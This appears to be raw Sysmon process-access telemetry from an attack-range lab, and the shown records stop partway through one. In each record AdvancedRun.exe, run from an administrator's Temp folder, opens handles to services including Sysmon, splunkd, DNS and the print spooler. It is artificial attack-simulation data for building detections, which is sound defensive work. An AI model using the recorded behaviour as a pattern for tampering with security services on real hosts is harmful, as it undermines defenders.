C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.045{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 